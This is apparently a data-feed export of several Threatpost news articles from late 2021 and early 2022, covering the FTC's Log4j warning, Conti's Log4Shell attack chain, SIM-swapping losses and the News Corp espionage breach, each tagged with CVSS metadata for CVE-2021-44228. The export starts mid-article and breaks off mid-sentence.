BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.\u201d\n\nWhile the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity \u2014 access control and segmentation.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T18:57:24", "type": "threatpost", "title": "The 5 Most-Wanted Threatpost Stories of 2021", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-27T18:57:24", "id": "THREATPOST:8FFF44C70736D8E21796B9337E52F29D", "href": "https://threatpost.com/5-top-threatpost-stories-2021/177278/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act ](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201c It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it concerned Context Map lookups, not the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228: lookups that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. \u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>)_. \n__ _ \n_**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T19:00:03", "id": "THREATPOST:89AA48C3C48FA427AB660EDEE6DBCBE2", "href": "https://threatpost.com/ftc-pursue-companies-log4j/177368/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-21T18:13:55", "description": "The Conti ransomware gang, which last week became the first professional crimeware outfit to adopt and weaponize the Log4Shell vulnerability, has now built up a holistic attack chain.\n\nThe sophisticated Russia-based Conti group \u2013 which Palo Alto Networks [has called](<https://unit42.paloaltonetworks.com/conti-ransomware-gang/>) \u201cone of the most ruthless\u201d of dozens of ransomware groups currently known to be active \u2013 was in the right place at the right time with the right tools when [Log4Shell hit the scene](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) 10 days ago, security firm Advanced Intelligence (AdvIntel) said in a [report](<https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement>) shared with Threatpost on Thursday.\n\nAs of today, Monday, Dec. 20, the attack chain has taken the following form, AdvIntel\u2019s Yelisey Boguslavskiy told Threatpost: Emotet -> Cobalt Strike -> Human Exploitation -> (no ADMIN$ share) -> Kerberoast -> vCenter ESXi with log4shell scan for vCenter.\n\n## Attack Chain\n\nStepping through that attack chain:\n\n 1. **Emotet** is a botnet that resurfaced last month on the back of TrickBot, now with the ability to directly install \u2026\n 2. [**Cobalt Strike**](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>), the legitimate, commercially available tool used by network penetration testers on infected devices and pervasively adopted by cybercriminals. It gives threat actors direct access to targets and, according to Boguslavskiy, precedes\u2026\n 3. **Human Exploitation**, which describes the stage of an attack in which threat actors personally investigate the network, looking for critical data, analyzing the network structure, defining the most important network shares, and looking at ways to elevate privileges, among other things. That poking around is followed by \u2026\n 4. **Missing ADMIN$ share. **Administrative shares are hidden network shares created by Microsoft\u2019s Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system. As [Microsoft](<https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/problems-administrative-shares-missing>) puts it, \u201cMissing administrative shares typically indicate that the computer in question has been compromised by malicious software.\u201d Next up comes \u2026\n 5. **Kerberoast. **Kerberoasting, a common, pervasive attack that exploits a combination of weak encryption and poor service account password hygiene, is a post-exploitation attack that extracts service account credential hashes from Active Directory for offline cracking. With regards to the final link in the attack chain, the Conti gang last week zeroed in on \u2026\n 6. **VMWare vCenter servers.** As of Wednesday, Dec. 15, Conti was looking for vulnerable VMWare networks for initial access and lateral movement. The VMWare servers are on a dismayingly [long list](<https://github.com/YfryTchsGD/Log4jAttackSurface>) of affected components and vendors whose products have been found to be vulnerable to Log4Shell.\n\nWithin two days of the public disclosure of the vulnerability in Apache\u2019s Log4j logging library on Dec. 10 \u2013 a bug that came under attack within hours \u2013 Conti group members were discussing how to exploit it as an initial attack vector, according to AdvIntel.\n\nApache patched the bug on Dec. 11, but its patch, Log4J2, [was found to be incomplete](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) in certain non-default configurations and paved the way for denial-of-service (DoS) attacks in certain scenarios.\n\nAs if two bugs aren\u2019t enough, yet another, similar but distinct bug was [discovered](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>) last week in the Log4J logging library. Apache issued a patch on Friday.\n\n## Conti Winds Up Its Exploit Machine\n\nAccording to the Thursday AdvIntel writeup, from Vitali Kremez and Yelisey Boguslavskiy, multiple Conti group members on Dec. 12 began to chat about exploiting the Log4Shell vulnerability as an initial attack vector. That led to scanning for vulnerable systems that AdvIntel first tracked the next day, on Dec. 13.\n\n\u201cThis is the first time this vulnerability entered the radar of a major ransomware group,\u201d according to the writeup. The emphasis is on \u201cmajor,\u201d given that the first ransomware group to target Log4Shell was a ransomware newcomer named[ Khonsari](<https://businessinsights.bitdefender.com/technical-advisory-zero-day-critical-vulnerability-in-log4j2-exploited-in-the-wild>). As Microsoft has [reported](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#Minecraft>), Khonsari was locking up Minecraft players via unofficial servers. First spotted by [Bitdefender](<https://www.bleepingcomputer.com/news/security/new-ransomware-now-being-deployed-in-log4shell-attacks/>) in Log4Shell attacks, the ransomware\u2019s demand note[ lacked a way to contact](<https://www.bleepingcomputer.com/news/security/microsoft-khonsari-ransomware-hits-self-hosted-minecraft-servers/>) the operators to pay a ransom. That means that Khonsari is more of a wiper, meant to troll Minecraft users by taking down their servers, rather than ransomware.\n\nKhonsari ransomware was just one malware that\u2019s been thrown at vulnerable servers over the course of the Log4j saga. Within hours of public disclosure of the flaw, [attackers](<https://threatpost.com/patching-time-log4j-exploits-vaccine/177017/>) were scanning for vulnerable servers and [unleashing quickly evolving attacks](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) to drop coin-miners, Cobalt Strike, the Orcus remote access trojan (RAT). reverse bash shells for future attacks, [Mirai and other botnets](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), and backdoors.\n\n## A Perfect Storm\n\nLog4Shell has become a focal point for threat actors, including suspected nation state actors who\u2019ve been observed investigating Log4j2, AdvIntel researchers noted. The compressed timeline of the public disclosure followed fast by threat actor interest and exploits exemplifies the accelerated trajectory of threats witnessed since the [ProxLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) family of bugs in Exchange Server in March and the subsequent attacks, they said: \u201cif one day a major CVE is spotted by APTs, the next week it is weaponized by ransomware,\u201d according to their writeup.\n\nBut out of all the threat actors, Conti \u201cplays a special role in today\u2019s threat landscape, primarily due to its scale,\u201d they explained. It\u2019s a highly sophisticated organization, comprising several teams. AdvIntel estimates that, based on scrutiny of Conti\u2019s logs, the Russian-speaking gang made over $150 million over the past six months.\n\nBut still they continue to expand, with Conti continually looking for new attack surfaces and methods.\n\nAdvIntel listed a number of Conti\u2019s innovations since August, including:\n\n * [Secret backdoors](<https://www.advintel.io/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent>): Conti\u2019s Atera Agent allows the gang to gain persistence on infected protected environments: especially those equipped with more aggressive machine learning endpoint detention and response anti-virus productions. \u201cThe IT management solution enables monitoring, management and automation of hundreds of SMB IT networks from a single console,\u201d AdvIntel described in an August report.\n * New[ backup removal](<https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love>) solutions that expanded Conti\u2019s ability to [blow up backups](<https://threatpost.com/conti-ransomware-backups/175114/>).\n * An entire operation to revive[ Emotet](<https://www.advintel.io/post/corporate-loader-emotet-history-of-x-project-return-for-ransomware>), which [resurfaced](<https://threatpost.com/emotet-resurfaces-trickbot/176362/>) in November.\n\nThe writeup shared a timeline of Conti\u2019s search for new attack vectors, shown below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/20163220/conti_timeline-e1640035956574.jpg>)\n\nTimeline of Conti\u2019s search for new attack vectors. Source: AdvIntel.\n\n## Keeping Your Head Above the Logjam\u2019s Water\n\nAdvIntel shared these suggested recommendations and mitigations for Log4Shell:\n\n * The Dutch National Cyber Security Center shared a list of the affected software and recommendations linked to each one of them [on GitHub](<https://github.com/NCSC-NL/log4shell/tree/main/software>).\n * Here are [VMWare\u2019s workaround instructions](<https://kb.vmware.com/s/article/87081>) to address CVE-2021-44228 in vCenter Server and vCenter Cloud Gateway (87081).\n\n## When Will It All End?\n\nLou Steinberg, former chief technology officer at TD Ameritrade, said it ain\u2019t over til it\u2019s over, \u201cAnd it\u2019s not over.\u201d\n\n\u201cWe don\u2019t know if we patched systems after they were compromised from Log4J, so it may be a while before we know how bad things are,\u201d he said in an article shared with Threatpost on Monday. \u201cThis will happen again. Modern software and systems are built from components which aren\u2019t always trustworthy. Worse, bad actors know this and look to subvert the components to create a way into otherwise trusted software.\u201d\n\n122121 10:25 Added more attack chain details provided by AdvIntel.\n\n122121 13:00 Removed brute-force from the attack chain, given that, as AdvIntel explained, the brute-forcing of encrypted hashes carried out in these attacks is a different kind of brute-forcing than the typical definition of trying numerous credentials.\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T22:11:30", "type": "threatpost", "title": "Conti Ransomware Gang Has Full Log4Shell Attack Chain", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-20T22:11:30", "id": "THREATPOST:4D63851D1493E3861204B674ADBC7F01", "href": "https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T22:37:59", "description": "SIM-swapping \u2013 the practice of duping mobile carriers into switching a target\u2019s phone services to an attacker-controlled phone \u2013 is on the rise, the Feds are warning \u2013 leading to millions in losses for consumers who found their bank accounts drained and other accounts taken over.\n\nSubscriber Identity Modules (SIMs) are small chips inside mobile phones that allow the carrier to identify and register subscriber devices \u2013 a requirement to provide service to them. Most SIM-swapping attacks take the form of social engineering, where the criminals impersonate victims and convince customer-service agents to change over victims\u2019 services to new phones that they control.\n\nOnce the service has been redirected, the crooks have access to any of the victims\u2019 calls, texts, voicemails and saved profile data, which allows them to send \u201cForgot Password\u201d or \u201cAccount Recovery\u201d requests to the victim\u2019s email, which enables them to easily defeat two-factor authentication that uses one-time passcodes and thus to crack high-value accounts.\n\nWhile SIM-swapping (aka SIM-jacking) isn\u2019t a new practice, the attacks now seem to be accelerating at a rapid clip: Last year, the FBI Internet Crime Complaint Center (IC3) received 1,611 SIM swapping complaints with adjusted losses stemming from resulting account takeovers and data theft totaling more than $68 million, [it said this week](<https://www.ic3.gov/Media/Y2022/PSA220208>). In contrast, for the entire three-year period between January 2018 to December 2020, there were just 320 SIM-swapping complaints, with adjusted losses of approximately $12 million.\n\n## **SIM-Swapping: All Too Easy**\n\nIt\u2019s usually not a difficult plan to execute successfully, given that many carriers [don\u2019t ask in-depth security questions](<https://threatpost.com/social-engineering-telcos-phone-hijacking/144495/>) that fully verify that the caller is in fact the legitimate cell phone user. Often, the challenge questions can be answered with previously phished information or even with public information found on social-media sites.\n\nThe epidemic of large-scale data breaches also contributes to the gambit\u2019s high rate of success, according to Chris Clements, vice president of solutions architecture at Cerberus Sentinel.\n\n\u201cWhen people wonder what the consequences of large-scale data breaches are, this is exactly it,\u201d he noted via email. \u201cBoth people and companies have become conditioned to being able to verify identity through simple questions like Social Security number or mother\u2019s maiden name. Unfortunately, this falls apart completely when data breaches affecting millions of people routinely occur.\u201d\n\nOther attack vectors include phishing and insider-threat avenues. For instance, when it came to light in 2019 that Twitter CEO Jack Dorsey was the victim of a SIM swap, the New York Times [reported](<https://www.nytimes.com/2019/09/05/technology/sim-swap-jack-dorsey-hack.html>) that \u201chacking crews have paid off phone company employees to do\u2026switches for them, often for as little as $100 for each phone number.\u201d Again, this type of accomplice-cultivation isn\u2019t unusual \u2013 it [even resulted in a lawsuit](<https://threatpost.com/att-faces-224m-legal-challenge-over-sim-jacking-rings/136645/>) for AT&T in 2018.\n\nSIM-swapping is not just happening in the United States, either: The Spanish National Police, for instance, this week [busted open](<https://www.policia.es/_es/comunicacion_prensa_detalle.php?ID=11102>) a SIM-swapping ring that got around carriers\u2019 photo-based account verification by using non-original photos of victims to request swaps.\n\n## **Protection Responsibility Lies with Carriers**\n\nThere\u2019s very little that end users can do to avoid becoming victims of SIM-jacking jerks (although the FBI recommends a few protection steps, below). Primarily, it\u2019s the mobile phone company\u2019s responsibility to keep its house in order, researchers said.\n\n\u201cAll organizations, but especially service providers must move from more simplistic means of validating identity to more sophisticated ones,\u201d Cerberus\u2019 Clements said. \u201cPIN codes unique to each user\u2019s account can be one way of adding additional security to the process. \u2018Out of wallet\u2019 questions are another alternative that works by verifying much harder to compromise information such as last three home addresses or cars. It may be more of a hassle for everyone, but it\u2019s simply no longer viable to rely on information that has been routinely compromised to validate a person\u2019s identity.\u201d\n\nAnother best practice that all businesses can implement is to move on from SMS-based 2FA, others said.\n\n\u201cSIM-swapping attacks have been going on for over a decade and have likely resulted in billions in stolen cryptocurrency and other financial crime,\u201d Roger Grimes, data-driven defense evangelist at KnowBe4, said via email. \u201cSMS-based MFA has to be the most popular MFA option used on the internet, and most of the time, people do not have a choice of whether to use it or not. Their bank, vendor or service says they have to use it. And, let me say again, the U.S. government has said not to use it since 2017. The better question to ask is why so many services and vendors are still using SMS-based and phone-number based MFA five years after the U.S. government said not to use it? Why are we so slow and broken?\u201d\n\nThe FBI recommended this week that mobile carriers take the following precautions:\n\n * Educate employees and conduct training sessions on SIM swapping.\n * Carefully inspect incoming email addresses containing official correspondence for slight changes that can make fraudulent addresses appear legitimate and resemble actual clients\u2019 names.\n * Set strict security protocols enabling employees to effectively verify customer credentials before changing their numbers to a new device.\n * Authenticate calls from third-party authorized retailers requesting customer information.\n\n## **SIM-Swapping Consumer Protection Tips**\n\nThe FBI also recommended this week that individuals take the following precautions:\n\n * Do not advertise information about financial assets, including ownership or investment of cryptocurrency, on social-media websites and forums.\n * Do not provide your mobile number account information over the phone to representatives that request your account password or PIN. Verify the call by dialing the customer service line of your mobile carrier.\n * Avoid posting personal information online, such as mobile phone number, address or other personal identifying information.\n * Use a variation of unique passwords to access online accounts.\n * Be aware of any changes in SMS-based connectivity.\n * Use strong MFA methods such as biometrics, physical security tokens or standalone authentication applications to access online accounts.\n * Do not store passwords, usernames or other information for easy login on mobile device applications.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-10T22:13:33", "type": "threatpost", "title": "Sharp SIM-Swapping Spike Causes $68M in Losses", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-10T22:13:33", "id": "THREATPOST:795C39123EE147B39072C9434899E8FE", "href": "https://threatpost.com/sharp-sim-swapping-spike-losses/178358/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "The Chinese hackers responsible for an attack on media giant News Corp last month likely were seeking intelligence to serve China\u2019s interests in a cyberespionage incident that shows the persistent vulnerability of corporate networks to email-based attacks, security professionals said.\n\n[Reports](<https://www.theguardian.com/media/2022/feb/04/new-corp-hack-murdoch-media-firm-believes-hackers-links-china>) on Monday revealed that a Jan. 20 incident at Rupert Murdoch\u2019s media giant involved an attack on journalists\u2019 email accounts that gave the intruders access to sensitive data. The breach \u2013 limited to several individuals working for outlets including News UK, the Wall Street Journal and the New York Post \u2013 has raised concerns over the safety of confidential sources working with journalists affected by the incident.\n\nIn an email to staff, News Corp cited a \u201cforeign government\u201d as responsible for the \u201cpersistent nation-state attack\u201d and confirmed that \u201csome data\u201d was stolen, according to published reports. The media giant enlisted the help of cybersecurity firm [Mandiant](<https://www.mandiant.com/>) to investigate the incident, which the firm said is likely the work of a China-sponsored actor.\n\n\u201cMandiant assesses that those behind this activity have a China nexus, and we believe they are likely involved in espionage activities to collect intelligence to benefit China\u2019s interests,\u201d said David Wong, vice president of consulting at Mandiant, in an emailed statement to Threatpost.\n\n## **Targeting Journalists for Cyberespionage**\n\nIndeed, while China typically targets \u201cmilitary and intellectual property\u201d in its state-sponsored attacks, journalists also are \u201cfairly high on their radar for espionage\u201d due to their work with sources \u2013 confidential and otherwise, as noted by one cybersecurity professional.\n\n\u201cJournalists can have access to sources and intelligence about adversaries and other opponents of the Chinese regime, both foreign and domestic, or can be researching stories that could generate negative publicity for the Chinese government,\u201d Mike McLellan, director of intelligence for cyber threat intelligence firm [Secureworks Counter Threat Unit](<https://www.secureworks.com/about/counter-threat-unit>), wrote in an email to Threatpost on Monday.\n\nPaul Farrington, chief product officer for security firm [ Glasswall](<https://glasswallsolutions.com/>), agreed that it\u2019s \u201ccommon for politically motivated cybercriminals to mine reporters\u2019 materials for intelligence,\u201d given their frequent conversations with confidential sources that have access to information about current and future geopolitical events.\n\nMoreover, China has previously shown an interest in attacking journalists, making this latest attack \u201centirely consistent with past Chinese state-sponsored behavior,\u201d concurred Dave Merkel, CEO of cybersecurity firm [Expel](<http://www.expel.io/>).\n\nHe cited [a previous attack](<https://threatpost.com/inside-targeted-attack-new-york-times-013113/77477/>) on the New York Times by China in 2013 as a precedent for the nation\u2019s targeting of journalists. Moreover, the threat actors\u2019 use of business email compromise (BEC) to pull off the attack \u201cmakes sense\u201d and also is consistent with nation-state actors, Merkel observed.\n\n\u201cWhen it comes to cyberattacks, nation state actors will only be as advanced as they have to \u2013 why burn expensive zero days if you don\u2019t need to?\u201d he said.\n\n## **Preventing BEC Attacks**\n\nIn fact, Merkel said the No. 1 source of attacks against Expel customers is BEC. \u201cThere\u2019s no reason to think Chinese state-sponsored groups wouldn\u2019t use the same tactics against their targets if those tactics work \u2013 and news organizations are definitely 